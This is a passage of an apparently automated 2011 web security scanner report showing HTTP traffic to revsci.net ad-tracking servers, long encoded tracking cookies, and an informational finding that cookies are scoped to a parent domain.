rsi_us_1000000="pUMtIz9HMAYYlQ3HkF1OZPUpqmeY/O+XwFz1otrSvh9FA3pBS5rvxaEDrtZ/8iFxwFHuk3HzfF6RnH1KcwCoCDpjNA52ICacMuOkNFuYZDRVlvGwphfC+hJ62UHuht7hurskQCdkl8BBA9YeoloJP+82N7nO8CLPh0O2zrokDHHVze736GNGTByX7Bt9/4a0YDsIgCcJUl/EAmKDM0MPmVqoLx1Po7L/4vszQiS50rbH/A0UA3yLynfL4JY0I5AQIniy0KeDLqxeS5AlTzdyWMYVnPCFUP6e3OSZVG5DyJXtB1l1ET4jI5MgKHvUk++L+Y0lXFAaE4n5+ZvsES12hQIK4yoUblXR9VX9t5NEBwSv52icvj+fazqjuBUDZqw6BMDF48or7lSDggOV4W4gqCPEVxiCNV7/sqKfR02CuEJKWrrGOODvgUJkG/OOTDipobXVmK1Y58Jnw2UiHbAem8a96yXwGDyw5cl+kEq4SnyR7Tk2pLomO79LjDYJJVx7V1CpqCprKyNGXrBNx0tw8H5oYEZ1vmgA82dVGr09qLYiE0zLUlk5TTwZE674HIuOGfUFMkA91GcJViBUkU5xAudvDUKrzFkPAenNYq1BKgnDRU4Elyz56K/KtJTsCUtdxmlbmLXKDhee0cq+N8fk6NMDg8Dk9M5opcjSNM9Hy+X98NoCtLisxc0IlkMIDAUPan2xIoA7FBIv0Z1T91KkY73zDc/IQr38PV3yPOtPYWUwuS0+jSSKKE9on0Fa26kbdLgaXkJz3mQwTGj6+56vSyITpOfOepb5gDE3GDn1NeF8GVbkHUk+9zY8eH3V47jDQwyepZt3Sn5jX3gVGoKFZMGhQYyBtCxk2knN3OYQA7msg92HTm59G/lRvCd6AFQi9WuXKVWvyVWDuHpCxgfGcWYxTAkKlVpU4KlUOJ0HUL5M3yd+MPWd0w9PjaVOH4IbBv+JJf+tjfdurHyJAeIPx33+X43qqcAQ7EPSb+6Ogg14CtkDMQxGrqHWwywTrOYbi9Rs5OB+EPp2SjloTrfW1irr4grt03pBnb0cvEJuGSdc/ilfX2wobXhx9QqN0QlNngUltQ2K9SZ7CdyDsDKPZnrYNifwcjHE2DFKk5xiYBdB0z5e+qrveN01zCbhfp7me8PCyGi/xLc3+SaGTxsYDKsK396e/khEumVl10YAebsP5li29FdAlodk2PEWOkjJ/8p3ix4xQ1dbM4vJdA14nTPTRhqSdu28X5EJGZpCTtD+ATHv0unWZmTsjbtVhnAOO8Sm3xml2JcJe7c/e9z2SDyIlbmU0LcSMZMjrJ/I+FHWVNdp6s/7Yl+XnxY5wyNhwk+K5DvCot7xDhJQoiwD9fdrCT0CSXyhOR2nUQTrt+SVgxekVl3CJdBIQi0cEhYvuittYMEBHJ/QEeVPPOO3YvPDO2thi4mQJSya55y5MmdBKVA2W1jT5OFmplwgS6NEFU5V1+8ugqRBT3/LXqr4t5lB5lpRuR4Y4EU+2vzLLevxWNtpnerZ4QTJ4PPShSS9x2IMCzVKPPlYJJJWRmBRxpALJD0K1IgmV925cNUKfEm3WkCZQ/lTnfo97iArddG/i4MONI+jq5OY+Kw="; udm_0=MLv3NDMJZjpn3hc5cPvVXAhr9tL5IsNhE+o2q7+zNiGkwsrgKVl5C87WXdKpBtXTEpWpVu0WyMfdzGdXZzEZUgcPzGLMxSlWdClte0WwZXKN7rgwOQJuVEGenaK8r7q+d5aU8IrugEjHv4n45RwakmTqm/xLJJ5/xWydy0fFEI5jFj+rH8q43KgDX76T+gGHXNi1fm9bmrn7CMZLtlVIqi9iLhf39b/c5S0fH2V5aTM6EpxXi9DnX/EeicbeKbEAqVpR0lMSez33seljK1UibZZ5+3K98RVeTAfX3HplWAUIRuETSJVyf9kcOiNU89Bn5jGUd++eIbyvt+J9qXjXpYe/2oJOkdf0X/aGMHzbaTg18GvSSqpVegRkxBrRa+q7tDOitEnKbmLTboTTTRrYDHJxupoIILCiceOFxKtdqfZbwJyEFw4yCfML/XjFtJN27G2Kpb4bNz88C9WZLHV7fWFSkRbSFFT+MhTic5ZTsYMn8PR2uimSfSFJByPd6wE2aXMcEsHUkPy68y9vJBr5EWBtZNxUmgdDFae3mcIAPRL/jytAgCrHv8y2oKSvkfAe+CXC2Tm2SzEPiYDN2WJgiV9uBxdn7phAIIo0AR4G+tbYYJTEEs7rncRvjFaLCjodBisthZA7Xg+KhXiLZLiSyqSIMRvNU5hbyRF2sDXJqp9OA4nogZXopXB17fenB2E5CzC5UmjE7I31XjGH+cBM5wDwyuNt4mWjEucyXWhck/Rqvt1z0hx4yGVD/z1ZdC3qrZWF9Nt2P7wSt5ibOtTE35GreLC5cEpQLb/dZyuyT7llpjvEVz9UG86Ch4He27A+kdr/uyx/TTL9VQNei6TwP1pns7CaS84QNI+EwOL/DmlMZxZZvk8Zm6fGkHr/ULpBIbtmGxZqYsFb/4uO0gVhryg8YH2aXSUdBl11m+7rbif4jrvIJjCIC0B7D4ELggBA56qbjq1VB9yPk3+B8urNJtmQllEKR7u/jOWyeyf3U/MCMgPLSefWspM1N0QaIeL81QtIwhQcV//QS30Hf7oeHp2SPkJ9F7/0kW7h45uzz2pNrtKkf+ijXt2gsspGv5Zbw8XRS0Nw/pMju+RW5vSPWkJPqrl8uAUBdCytS0+1Mkco7QwLyF4jHCrn/fhOnqYaGcwtTolKoAGF72vhrviBCy3TrdyKPDhvrQOyq3XpBqc9myV6AaARkI3IlUSEr3eXIE0/6rcwF79VfoTQnubi3ZsYi4szeMivo9SfI2dnMu+wLgwuqNPUP2MXqhvgawqIgi8nj7PXQX9hnYr3G8+he8hyhGjrgWIucFi1ZVpTKyoEpwqD8CTYhoZryVOnBub2QxP0qPGQCuMkGNqGAyU12ezmJH+IOU6ROAI8ekvhuaO1ALiwpNAvBOz/jKrRB1DcoGgAlo0j+sVNR+WNz+uhDosPk4BsWQ==

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: rtc_uJev=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_M4Zd=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_eC0O=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_PWQ_=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_mCtf=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_LA6t=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc__ROU=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=pUPF5EuhOQMMpjaxq2F29/xUY651hLZPPu6KLEhAA886n2e1NMyNdTd0q7tfEV6W8KYgoaC/NzJwIw+BkVbQUlyrEgVUeakyMmtzOjwGpMueNHbhQOUYQcmu+Rp/cDp+Y0GRZki85xiNnO2gL5JKomkldK1kJfL7yLCbCRJ9QWbkENIix0WUcvmOaTynbtLJXgB1O8T4TrVVI9X6xXjztB2u+fu6LAvYXEVFWWI0Y/4zlDThaAxfF5u49CV6G+4ESJ+X16acbHPlK04sKAdRmjyoU9DXU5ZKptBktG7P/hvDFQRTVmSM1vEzZxRO8ewZnOsnyLLyIpCVtnm9OScw/ee7AeT6UnuJsR2xYIQNF2Kor6bTyo8iFiAeUukbKYXskQnXnt4Y0kcxl4UzqDcBTQCasrXgbPK7n6YPC9P5j/hljSS81dTj9xqWlGSl4lWV5BbLtlTpCzYOvxK1uvl8vDuPwDkt6qm3dopndnJpIL1jv6uXn9BQCJXboXu5U/ELaWmENtdMw7m/X0lC08FJ7UT6uiIFKEFUat9yL2DJbIhDCK7dWsRXXt8aNvEFxC01iQZl/oYm0XM1WAyGmQOkSM/qWOQyq7FLLXupN2VXNWbG+6Ypw1wY341IkbPsSDI+4D4I2a8V75YusKVQhm1RGTex; Domain=.revsci.net; Expires=Tue, 12-Jun-2012 11:20:05 GMT; Path=/
Set-Cookie: rtc_mGyF=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; Domain=.revsci.net; Expires=Tue, 12-Jun-2012 11:20:05 GMT; Path=/
X-Proc-ms: 2
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Server: RSI
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: application/javascript;charset=UTF-8
Vary: Accept-Encoding
Date: Mon, 13 Jun 2011 11:20:04 GMT
Content-Length: 733

/* Vermont 12.4.0-1262 (2011-05-26 11:09:14 UTC) */
rsinetsegs=['A09801_10102','A09801_10001'];
var rsiExp=new Date((new Date()).getTime()+2419200000);
var rsiDom=location.hostname;
rsiDom=rsiDom.repl
...[SNIP]...

12.105. http://pix04.revsci.net/D10889/a1/0/3/0.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pix04.revsci.net
Path:	/D10889/a1/0/3/0.gif

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

rsi_segs_1000000=pUPF5MmhOXMMpjaBv3Bh9uxc4xrMriSJbZsgJmILMDUmufM9tNd4heJ7St7GX0DL0+fSLUTLoEm+Lgqh8P1UFkgJne7ZsOV6Ta1iuv1MzhmYhirHc/Hg4emnRkQiJyODMbw1LI67VP6jyT9H+Vu8imVtfewvZBiSnz4xalQVQYQWZHho33J8VSL//eihmZmQwg8GB3pzT6R4US7aShMFmG4Cin3im/BWv6yFReAkWBsEPdpYNcWyvDqqrnxlZZDKHJC4T+B47iIv/HJ1MLMTKLDPZ0QU3pMIyAxsUIWT8mICGsDOf2mdhqaEBzvYBOSJj9WnbTMOix6NPe37+fqefwtcfaARBaQZQIiTyDUCPDwQBhpvtUBfjAS8kaXKqSkMc2rM9wWxbBSQF18ohs6P3M3PT0nfrVOCI5pCn/YlRkL9l0AuLM0tBin66DdW1xidw+wfkpX0tcTJPdWRpgX4sB0ykXVT/4UW7gErmYyY7iae28vg/n6E+TYAqMj344RefGov1AxYuCtpwjFkb+kFuXZvJxKF9y4HI6U4skleEX2jNq8+U64NHXYZ1k3b+2I8t8dmWFS3esgM0XOsP8Ya4i4B8d6luAC1h+RzMIm9OX6PGya/FFIKR6b5bSP4O5pRVwPQBtE7owiVQ3MF3r1cv3F7Oyw=; Domain=.revsci.net; Expires=Tue, 12-Jun-2012 11:25:47 GMT; Path=/
rtc_ayM_=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; Domain=.revsci.net; Expires=Tue, 12-Jun-2012 11:25:47 GMT; Path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /D10889/a1/0/3/0.gif?D=DM_LOC=http://bizo.com?&seniority=executive&industry=business_services&functional_area=it_systems_analysts&functional_area=information_technology&location=texas&group=tech_business_professional&group=high_net_worth HTTP/1.1
Host: pix04.revsci.net
Proxy-Connection: keep-alive
Referer: http://tunedin.blogs.time.com/2011/06/13/game-of-thrones-watch-its-all-in-the-execution-2/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=f6600bc0a97556506df2daf333d9f1f4; NETSEGS_H07707=82f4957c1a652091&H07707&0&4dfc9b6b&0&&4dd62389&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_I07714=82f4957c1a652091&I07714&0&4e047730&0&&4ddc9a7b&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_K05539=82f4957c1a652091&K05539&0&4e047732&1&10592&4dddf043&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_F07607=82f4957c1a652091&F07607&0&4e04773b&0&&4dddd39f&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_B08725=82f4957c1a652091&B08725&0&4e047743&0&&4dde0faf&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_E05516=82f4957c1a652091&E05516&0&4e047779&0&&4dddf225&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_G07608=82f4957c1a652091&G07608&0&4e04da55&4&10004,10009,10016,10017&4ddf3979&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_C07583=82f4957c1a652091&C07583&0&4e065339&0&&4de08ea4&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_A06543=82f4957c1a652091&A06543&0&4e091f12&0&&4de303e6&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_K05540=82f4957c1a652091&K05540&0&4e0bcd60&0&&4de5e0dc&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_L09855=82f4957c1a652091&L09855&0&4e0bd03c&0&&4de5b5e6&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_A06546=82f4957c1a652091&A06546&0&4e0d143b&0&&4de6f601&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_F10931=82f4957c1a652091&F10931&0&4e0dae7d&0&&4de84145&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_A09801=82f4957c1a652091&A09801&0&4e1ada42&0&&4df59bf8&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_E06560=82f4957c1a652091&E06560&0&4e1adad3&9&10133,10640,10654,10670,10448,10450,10451,10452,10454&4df43073&1f1a384c105a2f365a2b2d6af5f27c36; udm_0=MLv3NzUJZjpr3hc5wFS813GquQMtQrAqXr4DyJtMPyEMN2TS4VlY4qaUGoMGVAYaUgmDvwI5res2yCHqJwUpCl8bXI1x2wD2amdH8k/jmAEMGSOlVkBFtOHkIA6N1ceb/+CvvanugMzfmMxWWXiH+6F/8lLEaTCDxKBO/YXEqzX4Pi64WdCM+73ICL50mkePx5jppZKMzuvHQvSmzKdqHHrrktHJ7LGJATufSzktpJth5OLBEvqEdtzILZmKkac33pw9eJA0okhYvr3qEwAhbz8gJRIOqtT+5cjRdHKlimR/Zf93uEUDyKNOthtBPTpDfREoUp4+5xZWmQJB1g7Bxosyp7HtkUqHuuVgkejaqxCG/g0P7jfgEtR6yLJhEa1Mz7FcRqUGysjKJWzcg5bYZ/ah5Fad96qjRGwPmbnDK5pG67okplQUCPx11iN+fq6uDPiFmZyi0d8JFHm6/2xmN2F6CBXCK6nCSeag6hpLMYOrP3AuUlzqrT7U+Skck+w8glwHhLBLft6YDemqE7Xj0YSR6y4uerWSr2wDFEyV4QJzZ/f+aIOrMR+MkjPltiWeupGgUBrbVnlI24uQ8NgpQcaQKaAFcOoN3NIXqlndo6CvEMQnGhz7gC/JdhZoN7Wj/qpdMetXR/71M7dw3ZB7CuFbBcsMHprOAN3hCv3z/bsOsvah5chlzKYLwxCi8x5S6fQayhX7Wniskh5TCbKxZqXHH+QkNnIBee451U7u3RpQgE9T1SoYQ7zt0XqCh+TO9S2b4Mx54jZr0uA345XOjOU4v7nwrHmxWEA5L0F1MjsUmQnr3tclotWbW2w07LKBIo7yHjwliEDEm1pGvY+a+xfgHap83+GatrgN4ecSGRbCBFgCp+diviMKyrb0nXAwpNhKNkTwtiqdxn6jRuaSmQmu9WZeYV/AULKCZqkDldQFAQhnyVYu13NtRA/BR6BYbX7XsruYKzJ65hL/Vaisc52Il0CA9p8C3UjyqUD+M3O2IfGQZuo2tmWzjMz32TwvlxhESwu6XqR4oJPWtsvLJA1+T3RtNpAFkY6cd++fnc2AzOEeTu5kNwMVtlXikR8rGp9Pg9mwAzQjiMazwVr8v0V9JlbPx+CPllP7ni3ngUtRNGskfAGCc1hOSGLCJxqFvV1MmP4/aoZF6CEdwEEWtAaDLeeBC0kNj/wIEukEprxcgJda2HyyUZ8Hb3n5budHji3Z5USTlT4kELyS0IGH6x/OF7i4jeLIXokyAqHbH2pLeVL7YdRY925o6Xwxo0UorOxWbHFpgiOl1VCgM0O+0weuPSs4jnQ173hP1RYsBdNHJ7HfHDqStStYzQW297VlWqbgULKuXEdCMw2S0AcUlplKJlnmm+8ZiTNZjzyy7PXjlAXzN6v9a7hYqf71T83w1Vf7A//vmNJZ9E2jvUwnvKeU96Tfcz7HTvKmGvis9fi3yNpdVS8Y18CscOUtVKfM+90wLhHo3WeyA4KHZLCXCPmbHEPZI163kCeYdzAGCD4BaQaadnfR6iSrVDGXghSYibeYzhLdX8Y5DCfeLtpNegAnOiNZKbAXJtLJ7EMgKSRXOwK8sVTAXW6bYp+u7INAiKp0chr3RDWlxuB12F0rPA5Y3CezL56SO1BI4S9YU7JCwjBlwIv4QODoc3a1Mbd8YgQKTOkyY8DoLmcIIHLimis0ygM1Bcggp9AvBPj/jKrxx1EMICy1b5gp+NXuJfk9LHBh+rmfQt7otQ==; rsiPus_TcLI="MLsXtaMOZwhnJpGoWeqiOkhRBfJq5qBSuRPKlWnBpfgZQSo6yJttbu+GJyr/FnqFiBtOj0MMf0A1OS6DgqF3FRtvufvgyQjAvbavIAzG/mrl5fos0jzFySM3Fy31Ao7Ebh3uztX78jATDhVNx1WRMLmFpna/hMyk0AkQ+RGNw8/ja9DZvVCIoWOZ3zoWVkQWa3moHLdcLNNI+7fIXit9fQONqT14U1w0FPBb9cgsoqgd68j6eMttu34aVZu/d+fUj7isKrKe4cndCaLYExmogONnWhKh+J9f7TLfa6PH0tptHMuZOF1cSr7P5cqBLbvFUcWsfjeMCG/f8spHnxQXAL8nRRC1wzaJ8qPaqDjVHhxu4nIepmoRGgrkOH8O0vQt4286anvsGhDbVv0Nsb7OVX9U0Zc4Vf4dZQ5G2e5hrZb1bJHQdQqjasWp1Nt8jnucTB8b4Q/Jnb3Fh7j+L7FGpNU/zU1yNFDSuSB54znzG47c6DP+6kDji+6RZbnzpWRyVAOCeS9Yc/ZzuNxpSay+Bdpn0kqwIBqeBXERDx1Z7KLNfWn7HtNHpyWaP3I4DNsn8PrZK8b2Gjc0e14CZ245dGCAuQdwJbc6j2SUur9nDYW7cL6tvB5y1MH0cPCty0J2lEFcYTKXCPFsSIp3YAkS32MvvsdoLn1d/krkLg4zda0cMm9Kua59JbmSoXHIJItgIVnEP3SkX7dxYOd/DG7OAoG0I5wUUn+AJ4LRa5kU32nRHVwQaDILCW1VzY0B3lSS6Z9mSpIBHUhRv5gciu6tTOzoiB2kH3XA72pKyLVROk9D4KLucgAAB+ueIRn8wR69h5gPZ+lHiKjpmubSMQ3yV8dSjX1dVUDfUUrBDh8OjRz7WzfanDaDqoUrFKI6EHw1XnTDWLM2cnSFkfFaQgOC8YrZowqyhJMuuVpIx/ixqnDsx9kGIztW8Hi1FuloHNVNBQHIU4G6iJqwoVu6bNOwfNRqNvD/w4oqWtvXqCvuIikhh9wMSzTE0UZqd6ZfWwpbTH1MOPdJdcxX31rZx4qSHBpMhxoyszkjZj9YPfgAMrb86c7kpVdrUj4LxTZs6Z5o82umuiNWChLZ/DvN29RfpYYmRQ073p9Hc48NlMflrzKueAGPB93K3+o1eEBylETNrLYuNFB68oIWntcNDAZLIg2HcsY3N4iXyk2yPWxW6r+YoZUTnq+vo9ElytuK/Jp8W7p4jtG47jpY8kQXsYtu9C3HHcoqi2SdLX2w/VUwBs/3SU3CI25hLq/LU0izRT66MSrwujtCk2q6sM4M"; rsi_us_1000000="pUMlIymnMBYY1A2AKVt/X42sJFnhBIsVXupLmVgPalQSXetQt1elVlvt4Kw5pRsR+P7ZtkH37C+PV21OTgK2tSplzTgX1CmAikLsMGDiVOeyz9gzHAnSm372yh4tVHRxb8PeHhUHejBiiZxOkhaZ045oThXnSR8DAX6fYV/ybIiqulf+Pu3RMyR5oF+yDfrCk40UNg0Mp16XYh7mRSVM/HoY4oDuWAom4gnqrhPe3r+iQUB0j3q0tkwKlBzk/9MGM3R2hf6QFQcFA/Y0lx/KIqYkEDuXlq7lweOLDGfB2KHCGVGkzKMsPN9GFXv/RUyGxIOOHISzxTE3RILsCvsP9soypT8NSUHCAcVVr5WpVuc2vUOi5MgBmGqRNBKolDzTy9/FBYJrmOzpeSO58TchDb61tROKccLOkHuqT1Q1cveswkoS3BkggmAJjNfOnag0xP3yotFAiIv7586EVSdiV8c84zW0RkP0Ltu6foHuhK1+R29GukGI/oWg2BobCpX/IAzdzVQKwKcBRQ4Dgwjtb8LRAPdEqwOSyrmF3oGNQaA0L+897x8nXL3Plyo1+OjxoEKVJ2EzmHkURDIYKyDLfZRA28hnB+UGj8LF9DhdnAYoQ6V2zOBqn6vO+BaB9czT3Pyzhw2zAuBWx+Jz5M1ht4XwlNIFhQpBD9DiYjy8+M6kL8fYMJ5ChzfLzauc4bc2f10QzIGJ/TOEQiJNgm/UYCPJimT8yavPrnQz1SwuiFKZxBHp4f29XKyXF0iX7bCrt6AOTgiss8wuNC3a/3aM/IgHRcWu3038LNW/sm7n7Gd0W4h5H72gd766m8rkC/YH8RRqsnZyX5R5wcPZLFUAJqEAOeZZjinbq/rgpxkp/x2CQ+hkPVNW2EjnMU77XaSR8pvN/HxrRF+AnH5BJ8USrrubV2etFGYmz1q0uLrxDphjCAN+lUd4NH5My9BwokFQvEeslMNVT42zlFkwpCZNLBWaUW9ajxJHkf7O1TOfSkcjuaQbwzei/zcbbxVZEzsH5nUPYbmnVGb97Da4oyNNuelVVMt7+XASLKnLONiHv3IGdI0yDuFGyHvA+Q